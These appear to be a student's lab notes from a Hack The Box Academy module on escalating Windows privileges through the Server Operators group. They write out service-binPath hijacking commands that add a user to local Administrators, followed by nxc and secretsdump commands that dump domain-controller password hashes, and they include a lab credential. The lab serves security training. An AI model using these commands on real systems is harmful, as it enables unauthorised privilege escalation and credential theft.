# Intro - The [Server Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators) group allows members to administer Windows servers without needing assignment of Domain Admin privs - It is a very highly privileged group that can log in locally to servers, including DCs - Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privs and the ability to control local services # Example with `AppReadiness` ## Examine target service - First, examine the `AppReadiness` service to confirm that it starts as SYSTEM ```cmd sc qc AppReadiness ``` - Next, use the service viewer/controller [PsService](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice), which is part of the Sysinternals suite, to check permissions on the service - Note: `PsService` works much like the `sc` utility and can display service status and configurations and also allow you to start, stop, pause, resume, and restart services both locally and on remote hosts ```cmd c:\Tools\PsService.exe security AppReadiness ``` - The above confirms that the Server Operators group has [SERVICE_ALL_ACCESS](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights) access rights, which gives us full control over the `AppReadiness` service ## Add target user to Admins group by modifying `binPath` for target service - Now, confirm that the `server_adm` user is in the Administrators group ```cmd net localgroup Administrator ``` - Next, change the binary path to execute a command which adds the `server_adm` user to the default local administrators group ```cmd sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" ``` - If we try to start `AppReadiness`, it will fail but still recheck membership to the Administrators group ```cmd-session sc start AppReadiness net localgroup Administrators ``` - As shown above, `server_adm` is now a member of the Administrators group ## Exploit new membership in Admins group - Use `nxc` against DC to see if `server_adm` has PWNED status - If yes, retrieve NTLM password hashes with `secretsdump.py` ```bash nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!' secretsdump.py [email protected] -just-dc-user administrator ``` --- # Exercise - `ping` test ![[images/Pasted image 20260220194523.png]] - `nmap` scan ![[images/Pasted image 20260220194552.png]] - `rdp` into target with given creds - light internal enum ![[images/Pasted image 20260220194657.png]] - We are in the `Server Operators` group but `SeBackup` and `SeRestore` are disabled - Enumerate the `AppReadiness` service - `AppReadiness` starts as LOCALSYSTEM ![[images/Pasted image 20260220194923.png]] - NOTE: When in a `cmd` session, we can simply use `sc`, but, when in a`powershell` session, we need to use `sc.exe` - `Server Operators` can do all the things with the `AppReadiness` service ![[images/Pasted image 20260220195051.png]] - Confirm `server_adm` is not in the Administrators group ![[images/Pasted image 20260220195134.png]] - Modify the binary path for the `AppReadiness` service ![[images/Pasted image 20260220195212.png]] - Start the `AppReadiness` service - Failed as expected ![[images/Pasted image 20260220195306.png]] - Confirm `server_adm` is now in the Administrators group ![[images/Pasted image 20260220195318.png]] - Sign-out and reconnect `rdp`, then reconfirm group membership ![[images/Pasted image 20260220195456.png]] - Now try to reach the flag in `\users\administrator\desktop` > YAHTZEE ![[images/Pasted image 20260220195545.png]]